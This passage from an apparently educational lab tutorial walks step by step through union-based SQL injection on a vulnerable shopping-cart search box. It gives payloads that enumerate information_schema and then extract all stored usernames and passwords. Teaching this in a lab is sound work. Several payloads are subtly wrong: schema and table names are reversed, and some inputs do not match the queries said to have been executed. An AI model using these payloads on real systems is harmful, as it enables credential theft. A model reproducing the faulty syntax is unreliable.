a query which gets concatenated with the existing backend query. Let us try it
out: on the right-hand side of your screen you can see a shopping cart
application in which we have shown the search functionality. Try to search for
an item by entering its name; if the item is there then it will be listed for you,
otherwise it returns an "item not found" error.
Step 13: Trying to do SQL injection on the database
a) Type django in textbox
b) Click on submit
c) Observe the output

Step 14: Analyzing the original query
a) We have just entered django and the application shows the output;
the original query executed in the backend is
b) Original Query: select product_name, price from product where
name='django'
Step 15: Now you have to concatenate a SQL query with the existing user
input and see how the SQL query gets transformed.
a) Type input as django' union all select 1, 2# in textbox
b) Click on Submit button
c) Observe the output.

Step 16: Analyzing the modified query.
Now the query executed is "select product_name, price from product
where name='django' union all select 1,2#'". So, if you are able to see the
product_name and price of the product django, then it means that the above
query was valid. The union operator in SQL allows you to concatenate
two SQL queries and execute them. But it will only be a valid query if the number
of columns selected on the right-hand side and the left-hand side of the union
operator is equal. In the above query there are two columns selected on the left-hand
side, i.e. product_name and price; similarly, on the right-hand side we have selected
two columns, i.e. 1 and 2. Usually when we are doing injection the left-hand
side query will not be visible, so we have to do trial and error with dummy
SQL queries. Once we find out the number of columns selected on the left-hand
side, we can build the injection query accordingly. The next experiment
will demonstrate how to dump the mysql metadata database information.
Step 17: Choose page 6 and read the following instructions:

Dumping the mysql metadata database

The search field in the shopping cart application is vulnerable to SQL injection.
We will be using this vulnerability to dump data from the metadata database. The
name of the mysql metadata database is information_schema. It contains the details of
the other databases and their tables. Usually only the mysql root user has access to this
database, but many web applications run SQL queries as mysql root, leaving it
vulnerable and giving us the privilege to get information from it.

Step 18: Dumping data from database
a) Type django' union select 1, table_name from
tables.information_schema# in the textbox
b) Click on Submit
c) Observe the output

Step 19: Analyzing the modified query

a) Modified Query: select product_name, price from product
where name='django' union all select 1, table_name from
tables.information_schema#
b) As you can see in the output, the above query lists all the tables in the
mysql database along with the product_name and price of the django
product.
Step 20: Now we will see the columns of a specific table that we have found.
a) Type input as django' union select 1, column_name from
columns.information_schema# in the textbox.
b) Click on Submit.
c) Observe the output.

Step 21: Analyzing the modified query


a) Modified Query: select product_name, price from product
where name='django' union all select 1, column_name from
columns.information_schema where table_name='login'#
Step 22: Now you have the information regarding the tables and their columns. Using
this information we will construct an injection query to get the username and
password of all the users registered at the shopping cart application.
a) Type django' union select username, password from login#
b) Click on submit
c) Observe the output

Step 23: Analyzing the modified query
a) Modified Query: select product_name, price from product where
name='django' union all select username, password from login#
